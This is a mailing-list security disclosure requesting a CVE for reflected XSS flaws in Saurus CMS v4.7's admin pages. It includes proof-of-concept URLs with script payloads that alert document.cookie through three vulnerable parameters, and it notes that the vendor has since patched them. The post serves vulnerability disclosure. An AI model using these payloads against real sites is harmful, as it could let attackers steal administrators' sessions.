[prev in list] [next in list] [prev in thread] [next in thread]
List: oss-security
Subject: [oss-security] CVE-Request -- Saurus CMS v.4.7 (Community Edition, released: 12.08.2014) -- Multiple
From: Steffen_Rösemann <steffen.roesemann1986 () gmail ! com>
Date: 2015-01-28 4:50:26
Message-ID: CALH-=7wwFG69Z-6XHD-R0UsmHhQ7rj+FSWZmfzPayv6E1kbeUA () mail ! gmail ! com
[Download RAW message or body]
Hi Josh, Steve, vendors, list.
I found multiple reflecting XSS vulnerabilities in the administrative
backend of the content management system Saurus CMS v. 4.7 (Community
Edition, released: 12.08.2014).
The parameters used in the following PHP files are prone to reflecting XSS
attacks (including exploit examples):
user_management.php (vulnerable parameter: "search"):
http://
{TARGET}/admin/user_management.php?tmpuser_search=1&tmpgroup_search=1&tmpsearch_subtree=1&search \
=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%3C!--&user_search=1&group_search=1&gr \
oup_search=1&flt_role=&keepThis=true&id=&op=&keel=&group_id=1&view=overview_false&user_id=&user_prev_id=&user_next_id=
profile_data.php (vulnerable parameter: "data_search"):
http://
{TARGET}/admin/profile_data.php?data_search=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%3C!--&profile_search=&profile_id=0
error_log.php (vulnerable parameter: "filter"):
http://
{TARGET}/admin/error_log.php?id=&op=&keel=&group_id=1&otsi=1&page=&filter=bla&algus=31.12.2014&l \
opp=07.01.2015&err_type=&otsi=1&page=&filter=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E%3C!--&algus=31.12.2014&lopp=07.01.2015&err_type=
Vendor patched this vulnerability in the latest commit of Saurus CMS v. 4.7
(CE, released: 27.01.2015).
Could you please assign a CVE-ID for this?
Thank you very much!
Greetings from Germany.
Steffen Rösemann
References:
[1] http://www.saurus.info
[2] https://github.com/sauruscms/Saurus-CMS-Community-Edition/issues/61
[3] http://sroesemann.blogspot.de/2015/01/sroeadv-2015-05.html
[4]
https://github.com/sauruscms/Saurus-CMS-Community-Edition/commit/8dec044d0fdabcb9b04e58037623385a97b0d288
[5]
http://sroesemann.blogspot.de/2015/01/report-for-advisory-sroeadv-2015-05.html
[6] http://seclists.org/fulldisclosure/2015/Jan/112
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic